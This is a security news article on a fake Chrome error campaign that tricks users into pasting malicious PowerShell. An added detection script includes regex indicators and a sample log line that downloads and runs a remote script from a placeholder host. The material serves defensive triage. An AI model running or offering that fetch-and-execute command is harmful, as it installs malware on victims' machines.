Fake Error Pop-Up Makes Users Infect Themselves with Malware


A new social engineering attack method uses a “copy-paste” technique to trick victims: attackers display a forged Chrome error message with instructions to “install a root certificate,” but following those instructions instead leads to the installation of infostealers or other malware.

Proofpoint researchers explain that the campaign usually begins with spam email or web browser injects. Users receive a pop-up dialog claiming that an error occurred while opening a document or web page, together with instructions to copy a “fix” script and paste it into a Windows PowerShell terminal. In reality, the pasted script is malicious and infects the user’s computer.

The researchers also reportedly observed various threat actors delivering malware such as DarkGate, Matanbuchus, NetSupport, and various information stealers. “Although the attack chain requires significant user interaction to be successful, the social engineering is clever enough to present someone with what looks like a real problem and solution simultaneously, which may prompt a user to take action without considering the risk,” said the Proofpoint report.

According to Cybernews, when the script runs it flushes the DNS cache, clears the clipboard, and displays a decoy message to the user while downloading and executing another remote PowerShell script. That second script is a downloader for a third script, which checks that the machine is not a virtual machine and then proceeds to a fourth and final script that downloads and executes the actual malware.
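The pasted script described in the two paragraphs above leaves a recognisable footprint in process command-line logs: a DNS cache flush, a clipboard clear, and a remote script download followed by dynamic execution, all in one PowerShell invocation. The following triage helper, an added example that is neither Proofpoint's nor Cybernews' code, scores PowerShell command lines against those behaviours and flags lines that combine two or more of them. It assumes one command line per log line (for instance the CommandLine field of a process-creation event); the log lines, the indicator names and the `placeholder.invalid` host are constructed for the example.

```python
"""Heuristic triage of PowerShell command lines for the copy-paste "fake error
fix" chain: a pasted script that flushes the DNS cache, clears the clipboard
and pulls a further remote PowerShell script to execute.

Added example, not code from the article or the researchers it cites. Input is
assumed to be one PowerShell command line per log line; the sample lines at the
bottom are constructed.
"""
import re
from dataclasses import dataclass

# Each indicator is one behaviour the article attributes to the pasted script,
# plus the virtual-machine check performed by the later-stage script.
# PowerShell is case-insensitive, so the patterns are too.
INDICATORS = {
    "dns_flush": re.compile(r"Clear-DnsClientCache|ipconfig(\.exe)?\s+/flushdns", re.I),
    "clipboard_clear": re.compile(r"Set-Clipboard|\[System\.Windows\.Forms\.Clipboard\]::Clear", re.I),
    "remote_download": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.I),
    "dynamic_exec": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "vm_check": re.compile(r"Win32_ComputerSystem|VMware|VirtualBox|Hyper-V|QEMU", re.I),
}

# Any single behaviour is routine in administration (flushing DNS, fetching a
# file); the combination is the signal, so require at least two distinct hits.
MIN_INDICATORS = 2


@dataclass
class Finding:
    line_no: int        # 1-based position in the input
    indicators: list    # names of the matched behaviours, in INDICATORS order
    command: str        # the offending command line, stripped


def classify(command: str) -> list:
    """Return the names of every indicator matched by one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(command)]


def triage(lines) -> list:
    """Return a Finding for every line that meets the MIN_INDICATORS threshold."""
    findings = []
    for i, line in enumerate(lines, start=1):
        hits = classify(line)
        if len(hits) >= MIN_INDICATORS:
            findings.append(Finding(i, hits, line.strip()))
    return findings


# Constructed sample log: three benign administrative lines and one that mirrors
# the chain the article describes (flush, clear clipboard, decoy text, fetch
# and run a second-stage script from a placeholder host).
SAMPLE_LOG = [
    'powershell.exe -Command "Get-Service | Where-Object Status -eq Running"',
    'powershell.exe -Command "ipconfig /flushdns"',
    'powershell.exe -Command "Invoke-WebRequest https://intranet.example.test/report.csv '
    '-OutFile C:\\Temp\\report.csv"',
    'powershell.exe -Command "Clear-DnsClientCache; Set-Clipboard -Value \' \'; '
    'Write-Host \'Fix applied, please wait...\'; '
    'iex ((New-Object Net.WebClient).DownloadString(\'https://placeholder.invalid/stage2.ps1\'))"',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"line {f.line_no}: {', '.join(f.indicators)}")
        print("   ", f.command)
```

Only the fourth sample line is flagged: the first three each hit at most one indicator, which is exactly why a threshold on distinct behaviours, rather than any single cmdlet, keeps the false-positive rate tolerable on real administrative traffic. Tune `MIN_INDICATORS` upward if your environment legitimately scripts both DNS flushes and remote downloads in one invocation.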

One frequently used payload is Lumma Stealer, which targets crypto wallets and steals and exfiltrates user information and session tokens. Many attackers have been using Lumma to download further malicious payloads that mine and steal cryptocurrency and perform other nefarious tasks.

The researchers from Proofpoint describe TA571 as a spam distributor that sends high-volume email campaigns to deliver and install a variety of malware for its cybercriminal customers. “The attack chain is unique and aligns with the overall trend Proofpoint has observed of cybercriminal threat actors adopting new, varied, and increasingly creative attack chains,” they conclude.